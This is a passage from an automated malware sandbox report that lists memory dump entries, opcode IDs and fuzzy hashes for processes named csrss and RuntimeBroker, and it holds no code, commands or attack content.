                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7901454d60a7d7dae9cdd1dbef10b0e65cecfbb325ba4d8d82df3c0180afc337
                                                      • Instruction ID: 1bcc153273e635023a5085625f2d3925bdc35962959c4365b321ff47c8c1c025
                                                      • Opcode Fuzzy Hash: 7901454d60a7d7dae9cdd1dbef10b0e65cecfbb325ba4d8d82df3c0180afc337
                                                      • Instruction Fuzzy Hash: 5F018B21E0C85A8FFA94FA548455AA83291FF55340F1442F6D80DD32D2CF38BD418B84
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e420d1e6fe104e70cd10390f7e7ed5ef79254df7c0fb2f071e1fb7f4f16bc15a
                                                      • Instruction ID: 4417abdbef1c0bcda944008d119b87f96253d1a83ae4d7787a3e7108bee77af6
                                                      • Opcode Fuzzy Hash: e420d1e6fe104e70cd10390f7e7ed5ef79254df7c0fb2f071e1fb7f4f16bc15a
                                                      • Instruction Fuzzy Hash: 46015A7190D7899FE702EB68C84429DBFB0FF42354F5541EAD040DB292DA385A49CB91
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f77092a6c563991a8a072aefe2d442f085e99faaf1550a5570fcf6ab254ae2cb
                                                      • Instruction ID: 906f464cc8681ed34cd3079b9667eea8f322b7f57ea113cfaa3151e4066879db
                                                      • Opcode Fuzzy Hash: f77092a6c563991a8a072aefe2d442f085e99faaf1550a5570fcf6ab254ae2cb
                                                      • Instruction Fuzzy Hash: 8A018F31E0D9668FEB61FB28845467C7790FF55350FA401FAC44ED7282DF3929818785
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fa75ccdf2b3aab6d1bcac7b5f1374372c33f4688e5763f8caf0d010090a013f0
                                                      • Instruction ID: ae587d8c9fa2b10dad1bb3720a8f5794a80afbf83b356ebd189300f2151b1652
                                                      • Opcode Fuzzy Hash: fa75ccdf2b3aab6d1bcac7b5f1374372c33f4688e5763f8caf0d010090a013f0
                                                      • Instruction Fuzzy Hash: E8014B7090D7899FE712EB64848429DBFB0FF02354F5441E6D440DB292DA385A48C755
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0137d537454019dbb374080674dc547e53d2e0856efe371c479ffea018196c71
                                                      • Instruction ID: fcca27f9d320b925f20e9cc32536dff977c6df31ca41e3e05c7aa82794f097c9
                                                      • Opcode Fuzzy Hash: 0137d537454019dbb374080674dc547e53d2e0856efe371c479ffea018196c71
                                                      • Instruction Fuzzy Hash: BBF0EC31B0CBC44FC729953D58590717FE1DB6B50234902FFC086C76A3DD55AC868341
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b70a9d54ae8882840df84be12b388b8565ec122fda0a77ec151b0f6123362baa
                                                      • Instruction ID: beec40a1d661fda6845e5fe6eb8bdb875e6cb8214a73f7f77c1d517449ed7b77
                                                      • Opcode Fuzzy Hash: b70a9d54ae8882840df84be12b388b8565ec122fda0a77ec151b0f6123362baa
                                                      • Instruction Fuzzy Hash: 87F03770E0890B8FEB98EA88C9656FE77B0FF55355F00063AC016C2294DF786A418A84
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction ID: 897828f0cad2904c0c3f1e321a18de19ee6196dcc1b12444fcd6fbfab5531f45
                                                      • Opcode Fuzzy Hash: 436df963ac4971543a82ffba23c3fc813e1d492e3c47f0be546b0eaff253ac19
                                                      • Instruction Fuzzy Hash: 72F0313094C85E8EEBB4FA14C8446EC73A2FF90391F9441F5C00DD31A2DF7869818B48
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e80000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9e529a8971c0c08948b526ccec0418b06fdbf8e572ef88851ffba145a90c2298
                                                      • Instruction ID: 3d9fe52116f3cd3b994742c43faaa95fa8d6b8a69e088d83ccc2dfed2720d27b
                                                      • Opcode Fuzzy Hash: 9e529a8971c0c08948b526ccec0418b06fdbf8e572ef88851ffba145a90c2298
                                                      • Instruction Fuzzy Hash: 31F0E53525EA89DFD742AB3CC8A58D8BF60FF03204F5A02EAD089CB563C315585DCB41
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848EB1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848eb1000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0632c1bb5ca69b2dfa0c7420c36e5504ff921517937fbf958f74a24f2d4911f6
                                                      • Instruction ID: 43aca0ba6e8474e38b8f545ab75262375fd0cefa1a79f335cb34b6ffae1f89d7
                                                      • Opcode Fuzzy Hash: 0632c1bb5ca69b2dfa0c7420c36e5504ff921517937fbf958f74a24f2d4911f6
                                                      • Instruction Fuzzy Hash: D5F05E20E1D94A8FE289FB1944993B972D1FFA8741F5401B9C40DD32C3DF3868C19749
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_34_2_7ff848e90000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction ID: 72dfe41cc1271e0580601fd6b3606b566de14bbf7e733d6eeb018244facd3da0
                                                      • Opcode Fuzzy Hash: b1f6850ea463fbd98618da56179b592f4e9e7f7347a8285fffb6543d260b0736
                                                      • Instruction Fuzzy Hash: 91F03A30D0C5064FEA58BA9894406B932D1FF45398F5145B5D85A83297DF78A8528688
                                                      Memory Dump Source
                                                      • Source File: 00000022.00000002.2384137738.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: dcb61017aa6ebd67def6948da7fe7457f7ca9c4e5845bcdc95d5f64eeebfe7b0
                                                      • Instruction ID: ac406ac42852808f62c905d119de1f589d0be17851a49c244d590aa1efe3aa34
                                                      • Opcode Fuzzy Hash: dcb61017aa6ebd67def6948da7fe7457f7ca9c4e5845bcdc95d5f64eeebfe7b0
                                                      • Instruction Fuzzy Hash: F7F06D7194E7C44FCB1AEA348868454BFA0EF6761174A41EEC086CF1A7EA2D8885C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: 4d1dc3c7272bbd0ba39532849e8e187d002855a1b83da22f18e7fa0e8252d0a0
                                                      • Instruction ID: e8b5015f11dccd5efb59787eb677b8d5bbef237379f64d70a153d6433356170c
                                                      • Opcode Fuzzy Hash: 4d1dc3c7272bbd0ba39532849e8e187d002855a1b83da22f18e7fa0e8252d0a0
                                                      • Instruction Fuzzy Hash: E1F06D71A0E7C48FC71AAA3488694647FA0EF6760174A42EFC045CF1A3EA2D8C89CB01
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: M
                                                      • API String ID: 0-3664761504
                                                      • Opcode ID: b63eb4b94b2a5ec45ff8642ae5e9edcd211a73fb929116bfb9e0b5cd34666344
                                                      • Instruction ID: 4a1c13e3be066d09a3ee9e2441e8f466112b83567c4b14db9f2655e3e0faa60e
                                                      • Opcode Fuzzy Hash: b63eb4b94b2a5ec45ff8642ae5e9edcd211a73fb929116bfb9e0b5cd34666344
                                                      • Instruction Fuzzy Hash: 43F0657190E7C44FD71AEA7548698557FA0EF6720174A42EFC045CF1A3EA2DC885C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: eb20b7538ac511a0eb12270b0ab9d68e738de0ce56f0672437c29057eadebb95
                                                      • Instruction ID: 82530b54d08026d188c1e7ab89e3f63f7f4bbc0d318394a18d4b9d66b4404b82
                                                      • Opcode Fuzzy Hash: eb20b7538ac511a0eb12270b0ab9d68e738de0ce56f0672437c29057eadebb95
                                                      • Instruction Fuzzy Hash: 54E0487184E7D44FCB06EB3488698553F60EF67715B8A40DEC046CF1B3E62D984AC701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 7c44b2ad038512428087d663be142df0efeecb1e77df74c176335ee64e638e88
                                                      • Instruction ID: dce711c93e5fd0f4f7f1ad47b073dff326ba95210c49aa258905e2be3404389f
                                                      • Opcode Fuzzy Hash: 7c44b2ad038512428087d663be142df0efeecb1e77df74c176335ee64e638e88
                                                      • Instruction Fuzzy Hash: 4BE01A7194E7C48FCB5AEB74886A9543FA0EE6B25178A40EEC049CF1B3E62D8849C711
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: fe7d4b0cceb505c55aec057c1103937f383ed4bfe90368f05ae1e76ebdeeb4ee
                                                      • Instruction ID: f1d5bdcc8e648c342f0c55b69fb260bd7d70b9d692a16981f95b1bf9cd10b7c1
                                                      • Opcode Fuzzy Hash: fe7d4b0cceb505c55aec057c1103937f383ed4bfe90368f05ae1e76ebdeeb4ee
                                                      • Instruction Fuzzy Hash: 70E0127184E7D44FD706EB74886A8557FA0EE67211B4A41EEC085CF1B3D62D8845C701
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: I
                                                      • API String ID: 0-3707901625
                                                      • Opcode ID: 23997f13607ec351811e02ed312d71d293ec2d4290c0ed4a9b438c5863b58d74
                                                      • Instruction ID: 83a484478e084617147a5668031d45fe7c02657b20421187584aae367b88d3a6
                                                      • Opcode Fuzzy Hash: 23997f13607ec351811e02ed312d71d293ec2d4290c0ed4a9b438c5863b58d74
                                                      • Instruction Fuzzy Hash: BEE01A6194E7C04FCB1AEB3488798557FA0EE6731078A41EEC045CF1B3E62D8849C701
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40f961b2d1363fdce3430419e5c082ec3722bc278ff0656a2dd33576e3d0af99
                                                      • Instruction ID: 2b834eb20b90a77ddddcf34068d9416385fd3925834a1dbba3b2ae5d2836a8ea
                                                      • Opcode Fuzzy Hash: 40f961b2d1363fdce3430419e5c082ec3722bc278ff0656a2dd33576e3d0af99
                                                      • Instruction Fuzzy Hash: DA025430E1CA5A9FEB98FB28949177973A1FF54B80F1445B9D00ED3287CF39A8418B45
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f217464d80534e7dc3f5fed0ec2400cd88ae21ea758447eeddc0f07e6ce06f9
                                                      • Instruction ID: bef722991c4f4c9984b2649a11badf68ecc38dbf4faa025d1b1b42e493544200
                                                      • Opcode Fuzzy Hash: 9f217464d80534e7dc3f5fed0ec2400cd88ae21ea758447eeddc0f07e6ce06f9
                                                      • Instruction Fuzzy Hash: 92416F51A4D9563EE309B7BCA0962FC7B80FF453A9F1844BBD04DC71E7DE286881C698
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8de22818cefd8bcafc3c1de363bbcc78b42b8c99d50ad4d8730078418be1e9c6
                                                      • Instruction ID: 9b803785744b8ccf80cbfe89e8233d8f33f70ad0b1517d625fdf6b517f55b7d4
                                                      • Opcode Fuzzy Hash: 8de22818cefd8bcafc3c1de363bbcc78b42b8c99d50ad4d8730078418be1e9c6
                                                      • Instruction Fuzzy Hash: B631E720B1DD5D6FE798F76C448A67972C1FF98359F5000B9E40EC32D7DE689C818644
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a17ff92591a6e8aed8b7267139cf613948a16ceb98f5a0557478e13edb7723e1
                                                      • Instruction ID: 95ab1d226de6024d617ae9237f535c740b1503749744165eef9b29f7bb1385c0
                                                      • Opcode Fuzzy Hash: a17ff92591a6e8aed8b7267139cf613948a16ceb98f5a0557478e13edb7723e1
                                                      • Instruction Fuzzy Hash: 8F31B030A0D68A8FDB46FB64C8549A97BF0FF16340F0901FAC009D72A3EB79A845C751
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9616d0b8327d2a7e57481f721adf55ed0a485714d2f1c0b707bc3cc5a594cf20
                                                      • Instruction ID: d6650761ae7cd658bd0b11721d36704b449bb79009d3ec146aa0c03c9167668d
                                                      • Opcode Fuzzy Hash: 9616d0b8327d2a7e57481f721adf55ed0a485714d2f1c0b707bc3cc5a594cf20
                                                      • Instruction Fuzzy Hash: A1318631E0CA4A8FD754EA18C4956B873A2FB98360F04467AC00ED72C7CF38AC418B85
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ed5aa33c6020f30edb84b7e1ebea38e17886f6329f10f423602031b6f3057ed4
                                                      • Instruction ID: e3788642aefcea7a25a8434599c1cc5b24a19e7b0ad947c3c3609ec1241f23e5
                                                      • Opcode Fuzzy Hash: ed5aa33c6020f30edb84b7e1ebea38e17886f6329f10f423602031b6f3057ed4
                                                      • Instruction Fuzzy Hash: 6A216751A4DD5A3EF65C72BC608A2F822C1FF483A9F1840BAE40DC31E3CD6CAC804698
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bfefcfb8c84988c111e731abf16c484a1a62fb70e8c65a8ee5d747ab432489b2
                                                      • Instruction ID: 45cc82dd7392b2ebb5d80bde3321ae951944a704ece72f49c5a5f416bb756b35
                                                      • Opcode Fuzzy Hash: bfefcfb8c84988c111e731abf16c484a1a62fb70e8c65a8ee5d747ab432489b2
                                                      • Instruction Fuzzy Hash: 85217122E0C90A4FEBA4FAA884547BC22D2FF943A4F9445B5D41DD3293DFB8AC408748
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 08da099025fbebd6f48213f202d00b19846a51463a9607e4143fd05cb38799d9
                                                      • Instruction ID: 341f200f8f912381be5fa46681226142e6e18c16852647095cc55a0a4b2594d5
                                                      • Opcode Fuzzy Hash: 08da099025fbebd6f48213f202d00b19846a51463a9607e4143fd05cb38799d9
                                                      • Instruction Fuzzy Hash: BA210531A0C6899FE311FBA8C8452EC7BB0FF42398F5445B6C0448B1D2DB781589CB45
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0ba61dcd472087a9ca150256a00e79688ae7cf61c713fa985634999fb5434df5
                                                      • Instruction ID: fa93aae6be6c5cc7f200c0460ededd4e18d9fa10ec4d7d1e4261ed8aab61ffe5
                                                      • Opcode Fuzzy Hash: 0ba61dcd472087a9ca150256a00e79688ae7cf61c713fa985634999fb5434df5
                                                      • Instruction Fuzzy Hash: 52114F31E0CA1A8FEA98FB6884556B972D2FF98740F5005BAD50ED72D6DF78AC024784
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3d356d9d0ff9462b06a91a29cd04f60571fc602890bcdeb50c894e6c79cf4c49
                                                      • Instruction ID: ff9bad647daf5f69a012c73b04babc535927f04d8427afc75ba8698baaffcb43
                                                      • Opcode Fuzzy Hash: 3d356d9d0ff9462b06a91a29cd04f60571fc602890bcdeb50c894e6c79cf4c49
                                                      • Instruction Fuzzy Hash: 4311EC70D08A198FDB94EB08C894BA973E1FB58315F1441BAD40EE72A0DB74AEC4CF85
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24544eff7a88e982933d0b6bb3d304a448fa49df45eb384ab4f53e3670e8626e
                                                      • Instruction ID: 4d7ae4f5fd71fa0be9c18334aa3d16aed8ddcbb35687c7ded30f3ad5af8f2608
                                                      • Opcode Fuzzy Hash: 24544eff7a88e982933d0b6bb3d304a448fa49df45eb384ab4f53e3670e8626e
                                                      • Instruction Fuzzy Hash: 29014956D8E9922ED30C76BCB8560F83B90EF0227AF0C90B7D08CCA163DE0850898799
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f58ee741a06094e22280f32860f468dc9f3c7d46309e28582bf770379b0de0e
                                                      • Instruction ID: 90e284778c9897b2c1963e39e1f766ee646615f2b69f5ad0d015767f3a853dbf
                                                      • Opcode Fuzzy Hash: 6f58ee741a06094e22280f32860f468dc9f3c7d46309e28582bf770379b0de0e
                                                      • Instruction Fuzzy Hash: EF11CE31A0C6899FE702FBA8C8412EC7FB0FF42354F5544B6C080DB292D67816498785
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b60fe05860ebf782a65654f61dc001fcf892e63be4007166410e591ca9a22b8b
                                                      • Instruction ID: 5680b1efbfdd8a2f54f45ad829ebe8f7b59af1fdfb7326df5332f3a1e42024aa
                                                      • Opcode Fuzzy Hash: b60fe05860ebf782a65654f61dc001fcf892e63be4007166410e591ca9a22b8b
                                                      • Instruction Fuzzy Hash: CD017133F089098FEB54AA58D4817FC77A2FB887A0F054031D01DE7185DB3AA9869754
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2485ed73d80d76c763817f23ebfa342e4f8eee313ba39ec52152979992dc102c
                                                      • Instruction ID: 6f2ab1f09430ffa3630ad3130ee30b940f2f52c7e742a361bd0d77d3400a4c34
                                                      • Opcode Fuzzy Hash: 2485ed73d80d76c763817f23ebfa342e4f8eee313ba39ec52152979992dc102c
                                                      • Instruction Fuzzy Hash: B3018C31A0D7899FE702FBA8C8842ED7FB0FF42354F5545A6C480DB292DA785649CB85
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 47b38da51319100d22b7b79d76fc9a141f1aa524fb1aa2b6fd32194d8f041c6b
                                                      • Instruction ID: f9eed623bd7347df14723c937f4247e6662f50db8f584df296767df12bad4915
                                                      • Opcode Fuzzy Hash: 47b38da51319100d22b7b79d76fc9a141f1aa524fb1aa2b6fd32194d8f041c6b
                                                      • Instruction Fuzzy Hash: BCF04C31D0D6864FF722B62484152BA3B92BF91758F0802BBC44EC70D3DEBC59068355
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ea0000_RuntimeBroker.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848EC1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EC1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848ec1000_RuntimeBroker.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000023.00000002.2386946807.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_35_2_7ff848e90000_RuntimeBroker.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction ID: 8c79e3898800fdb711297317867d8e852c3a97d4dfb126889a3967a440f68eea
                                                      • Opcode Fuzzy Hash: a78a74dc4bf2f834ffd4e85e6ada64bb77668f280636e538a7a23ceeaa807a1d
                                                      • Instruction Fuzzy Hash: 9CB00205C5E45F05E45431FB19460A974507FC555CFD51170D80D50185A9DD1595125A
                                                      Strings
                                                      Memory Dump Source
